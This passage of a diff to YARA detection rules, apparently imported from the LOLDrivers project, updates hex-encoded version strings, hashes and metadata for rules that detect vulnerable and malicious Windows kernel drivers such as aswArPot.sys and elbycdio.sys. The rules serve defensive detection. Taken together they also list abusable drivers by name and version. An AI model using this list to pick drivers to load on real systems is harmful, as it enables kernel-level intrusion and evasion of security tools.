 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c"
-		logic_hash = "78c3a92f79cbbc31d9191da527bf834e366454f1b5109600aca7954ca4e77226"
+		hash = "9dee9c925f7ea84f56d4a2ad4cf9a88c4dac27380887bf9ac73e7c8108066504"
+		logic_hash = "e7f65896009629498b16fdacd7dcdaafae8336365e621f791e880c108bbab75b"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004b00500072006f0063006500730073004800610063006b00650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0077006a00330032 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0038 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004b00500072006f0063006500730073004800610063006b00650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006b00700072006f0063006500730073006800610063006b00650072002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004c006900630065006e00730065006400200075006e006400650072002000740068006500200047004e0055002000470050004c002c002000760033002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0044006300500072006f00740065006300740020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b002000700072006f00760069006400650072 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0032002e0030002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0044006300500072006f00740065006300740020002800520029002000570069006e0038002e003100780036003400200064007200690076006500720020 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0044006300500072006f0074006500630074002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310032002d00320030003200300020004a00690061006e0067006d0065006e0020004500790075006e0020004e006500740077006f0072006b00200043006f002e002c004c00740064002e00200032003000310039 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpot_Avastantivirus_7AD0 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_9679 : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - elbycdio.sys"
 		author = "Florian Roth"
-		id = "e9db51b4-48a2-53a9-999d-5676d0a4aa91"
+		id = "a1b5efd0-2dd2-5c54-86b6-12684d6ea56b"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11136-L11155"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11876-L11895"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "7ad0ab23023bc500c3b46f414a8b363c5f8700861bc4745cecc14dd34bcee9ed"
-		logic_hash = "2cfb950364b5259679e0dcc7ebe34fd6703ae376b5e1717428a88f0c2ba823f5"
+		hash = "9679758455c69877fce866267d60c39d108b495dca183954e4af869902965b3d"
+		logic_hash = "fa486cd644c20c827abc8568933d8537c254cff445f2aef520775e119b6db067"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041007600610073007400200041006e0074006900200052006f006f0074006b00690074 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0041005600410053005400200053006f006600740077006100720065 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00320030002e0034002e00380033002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00320030002e0034002e00380033002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041007600610073007400200041006e00740069007600690072007500730020 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300032003000200041005600410053005400200053006f006600740077006100720065 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0045006c0062007900430044002000570069006e0064006f00770073002000780036003400200049002f004f0020006400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0045006c00610062006f0072006100740065002000420079007400650073002000410047 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002c00200030002c00200031002c00200031 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002c00200030002c00200030002c00200030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0045006c00620079004300440049004f }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043004400520054006f006f006c0073 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0045006c00620079004300440049004f002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003000300020002d0020003200300030003800200045006c00610062006f0072006100740065002000420079007400650073002000410047 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_83A1 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_8137 : FILE
 {
 	meta:
 		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - elbycdio.sys"
 		author = "Florian Roth"
-		id = "5164ae7c-795d-55fd-837a-e45a054fdd3e"
+		id = "0e696bff-b5da-5116-a5a7-341b6c3098b8"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11158-L11177"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11898-L11917"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "83a1fabf782d5f041132d7c7281525f6610207b38f33ff3c5e44eb9444dd0cbc"
-		logic_hash = "16b76760cc8831b7e53cb5f12625cd1dcd059253aa195d763011ccc1cf48a2c5"
+		hash = "8137ce22d0d0fc5ea5b174d6ad3506a4949506477b1325da2ccb76511f4c4f60"
+		logic_hash = "cd4ace0ee1000ec8367bdca57423f311d0993d54359e4b3ca6a503738ba07b3b"
 		score = 40
 		quality = 80
 		tags = "FILE"
@@ -225572,119 +225902,118 @@ rule LOLDRIVERS_PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_83A1 : FILE
 	strings:
 		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0045006c0062007900430044002000570069006e0064006f007700730020004e0054002f0032003000300030002f0058005000200049002f004f0020006400720069007600650072 }
 		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0045006c00610062006f0072006100740065002000420079007400650073002000410047 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002c00200031002c00200030002c00200031 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002c00200031002c00200030002c00200031 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002c00200030002c00200031002c00200030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002c00200030002c00200030002c00200030 }
 		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0045006c00620079004300440049004f }
 		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043004400520054006f006f006c0073 }
 		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0045006c00620079004300440049004f002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003000300020002d0020003200300030003500200045006c00610062006f0072006100740065002000420079007400650073002000410047 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003000300020002d0020003200300030003700200045006c00610062006f0072006100740065002000420079007400650073002000410047 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Trendmicroinc_Tmcommsys_Trendmicroeyes_C082 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Asmediatechnologyinc_Asmiosys_Asmediapcidriver_E465 : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - TmComm.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - AsmIo64.sys"
 		author = "Florian Roth"
-		id = "36d4d011-edf0-53e8-9665-b75520140df3"
+		id = "196ff2dc-bbf5-5728-bcc9-29fa774b1e84"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11180-L11199"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11920-L11939"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "c082514317bf80a2f5129d84a5a55e411a95e32d03a4df1274537704c80e41dd"
-		logic_hash = "de63522d95ff422588d388c3533e268bd09fcf895d60277b7f7470ca7b1e9a33"
+		hash = "e4658d93544f69f5cb9aa6d9fec420fecc8750cb57e1e9798da38c139d44f2eb"
+		logic_hash = "93c9c472f0664eabf5aeba70babe66f974fd79eaf37b65987c396e35faea4d4b"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005400720065006e0064004d006900630072006f00200043006f006d006d006f006e0020004d006f00640075006c0065 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00360030002e0030002e0031003000380034 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00360030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]005400720065006e00640020004d006900630072006f00200045007900650073 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0054006d0043006f006d006d002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000200028004300290020002000320030003200300020005400720065006e00640020004d006900630072006f00200049006e0063006f00720070006f00720061007400650064002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00410073006d006500640069006100200050004300490020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00410073006d006500640069006100200054006500630068006e006f006c006f00670079002000200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0031002e00300030003000300020006200750069006c0074002000620079003a002000570069006e00440044004b }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030002e0031002e0030003000300030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00410073006d0049006f002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00410073006d006500640069006100200050004300490020004400720069007600650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00410073006d0049006f002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a9002000410073006d006500640069006100200054006500630068006e006f006c006f00670079002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Creativetechnologyinnovationcoltd_Ctiiosys_Ctiiodriverversion_X_2121 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Paragonsoftwaregmbh_Biontdrv_Paragonsystemutilities_FB0D : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - CtiIo64.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - BioNTdrv.sys"
 		author = "Florian Roth"
-		id = "3cc780a4-7b9c-516e-91a1-705f785922d2"
+		id = "4c894211-9f20-562f-9e96-49c39fa690bf"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11202-L11221"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11942-L11960"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "2121a2bb8ebbf2e6e82c782b6f3c6b7904f686aa495def25cf1cf52a42e16109"
-		logic_hash = "58b715cbea724f7d8f946f613ec35fc3bf29cc34c1e32ebc2910d73092f96d83"
+		hash = "fb0dbc3b9c897b7571b94fb2203ffb1ac0facfe366b2cb1f91904ea5335018f0"
+		logic_hash = "1595824ab80a148d35a7dd7b389e14a6a2d7626e0ed7a49956a2574ff41f8b50"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00430054004900200049004f0020006400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0043007200650061007400690076006500200054006500630068006e006f006c006f0067007900200049006e006e006f0076006100740069006f006e00200043006f002e002c0020004c00540064002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e003000200078003600340020006200750069006c0074002000620079003a002000570069006e00440044004b }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e00300020007800360034 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0043007400690049006f00360034002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043007400690049006f003600340020004400720069007600650072002000560065007200730069006f006e00200031002e0030 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0043007400690049006f00360034002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003200310020004300540049 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041002000700061007200740020006f0066002000500061007200610067006f006e002000530079007300740065006d0020005500740069006c00690074006900650073 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500061007200610067006f006e00200053006f00660074007700610072006500200047006d00620048 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0033002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00620069006f006e0074006400720076 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500061007200610067006f006e002000530079007300740065006d0020005500740069006c00690074006900650073 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00620069006f006e0074006400720076002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200031003900390034002d0032003000310037002000500061007200610067006f006e00200053006f00660074007700610072006500200047006d00620048 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Ssmartsoftwaresolutionsgmbh_Sysdrvs_Sysdrvs_0E53 : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Pulsesecurellc_Neofltr_Secureapplicationmanager_8DBC : FILE
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - SysDrv3S.sys"
+		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - jnprva.sys, neofltr.sys"
 		author = "Florian Roth"
-		id = "9ace902a-a3bf-56fa-8eb8-99a82c1adf0b"
+		id = "64001b48-e8f6-562c-ba15-0fe98882781c"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11224-L11243"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11963-L11982"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "0e53b58415fa68552928622118d5b8a3a851b2fc512709a90b63ba46acda8b6b"
-		logic_hash = "4d165a6f340f31b18e62ae9f35dd1c5e278217b949e6162119f0e512a262dc38"
+		hash = "8dbc28fefb8cf9377be55a7c6062988df5a24f0ff475f6dd65cf07fe5173f51d"
+		logic_hash = "2bd8b8400552d8a0d8aced78dc5ca87f69d6495229d3eae7eb4a1e63a218cf3f"
 		score = 40
 		quality = 80
 		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00530079007300440072007600330053 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00330053002d0053006d00610072007400200053006f00660074007700610072006500200053006f006c007500740069006f006e007300200047006d00620048 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0033002c0035002c0036002c0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0033002e0035002e0036002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00530079007300440072007600330053 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00530079007300440072007600330053 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00530079007300440072007600330053002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a900200032003000300036002d0032003000310034 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004e0065007400420049004f0053002000520065006400690072006500630074006f0072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500075006c007300650020005300650063007500720065002c0020004c004c0043 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0038002c0033002c0033002c0031003300350030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0038002c0033002c0033002c0031003300350030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e0065006f0066006c00740072 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0053006500630075007200650020004100700070006c00690063006100740069006f006e0020004d0061006e0061006700650072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e0065006f0066006c00740072002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a900200032003000310034002d0032003000310038002000620079002000500075006c007300650020005300650063007500720065002c0020004c004c0043002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpotsys_Avastantivirus_14AD : FILE
+rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpotsys_Avastantivirus_4DA0 : FILE
 {
 	meta:
 		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
 		author = "Florian Roth"
-		id = "0501fc8b-cc72-5c03-97cf-411051119ccf"
+		id = "bde91bb0-9211-5fea-b725-d556c5a3ccc9"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11246-L11265"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11985-L12004"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "14adbf0bc43414a7700e5403100cff7fc6ade50bebfab16a17acf2fdda5a9da8"
-		logic_hash = "157a559b87310d33a96c77208afd4ae9ceea23df99417408e413dee0be507dd3"
+		hash = "4da08c0681fbe028b60a1eaf5cb8890bd3eba4d0e6a8b976495ddcd315e147ba"
+		logic_hash = "c8f2c5a171d1a7192a2eaeae0ab70ce97956b93e68db7a41265e54480bd582f1"
 		score = 40
 		quality = 80
 		tags = "FILE"
@@ -225692,1033 +226021,1190 @@ rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpotsys_Avastantivirus_14AD :
 	strings:
 		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041007600610073007400200061006e0074006900200072006f006f0074006b00690074 }
 		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0041005600410053005400200053006f006600740077006100720065 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310037002e0039002e0033003700350034002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310037002e0039002e0033003700350034002e0030 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310038002e0037002e0034003000310036002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310038002e0037002e0034003000310036002e0030 }
 		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
 		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041007600610073007400200041006e00740069007600690072007500730020 }
 		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300031003400200041005600410053005400200053006f006600740077006100720065 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300031003800200041005600410053005400200053006f006600740077006100720065 }
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Marvintestsolutionsinc_Hwsys_Hw_0483 : FILE
+rule LOLDRIVERS_MAL_Driver_Crowdstrikeinc_Csagentsys_Crowdstrikefalconsensor_94B8
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - hw.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - idmtdi.sys"
 		author = "Florian Roth"
-		id = "cfcc8aa0-6fde-56bd-8422-b9cbb559adce"
+		id = "b3173c53-ef34-5722-8f49-dd596733c7fe"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11268-L11287"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L2-L21"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "0483b32f9544e9c3cc3f206e7bc983ea83f5a9ca44864f2af9b8fc10ff45949f"
-		logic_hash = "30c9579c3df11a77899bab8bc0782ee00bf5cb8f08d10925a19de82c609b8373"
-		score = 40
+		hash = "94b87b1cdaf1d86c2bc4eacef45608d0f16fdd3b981b88cdddc16b6bc64fe25d"
+		logic_hash = "9376ab5835e07d117ee3d157713339c0ffeda2479cb8183dc82cfffcbb29971d"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004800570020002d002000570069006e0064006f00770073002000580050002d003100310020002800330032002f00360034002000620069007400290020006b00650072006e0065006c0020006d006f00640065002000640072006900760065007200200066006f007200200050004300200070006f007200740073002f006d0065006d006f00720079002f0050004300490020006100630063006500730073 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d0061007200760069006e0020005400650073007400200053006f006c007500740069006f006e0073002c00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002e0030002e0032002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002e0030002e0032002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00480077002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00480057 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00480057002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a900200031003900390036002d00320030003200330020004d0061007200760069006e0020005400650073007400200053006f006c007500740069006f006e0073002c00200049006e0063002e00200041006c006c0020005200690067006800740073002000520065007300650072007600650064002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00430072006f007700640053007400720069006b0065002000460061006c0063006f006e002000530065006e0073006f00720020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00430072006f007700640053007400720069006b0065002c00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00330034002e00310034003800300036002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00330034002e00310034003800300036002e0030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00430053004100670065006e0074002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00430072006f007700640053007400720069006b0065002000460061006c0063006f006e002000530065006e0073006f0072 }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00430053004100670065006e0074002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]002800630029002000430072006f007700640053007400720069006b0065002c00200049006e0063002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Geintelligentplatformsinc_Gedevicedriver_Proficymachineedition_Build_CAC5 : FILE
+rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Windbgsys_Microsoftwindowsoperatingsystem_6994
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - GEDevDrv.SYS"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - windbg.sys"
 		author = "Florian Roth"
-		id = "d90e2248-2b47-51d5-a3d2-06a7b61bc95d"
+		id = "05060e37-3c01-5b86-a3ee-6e141399164a"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11290-L11310"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L24-L59"
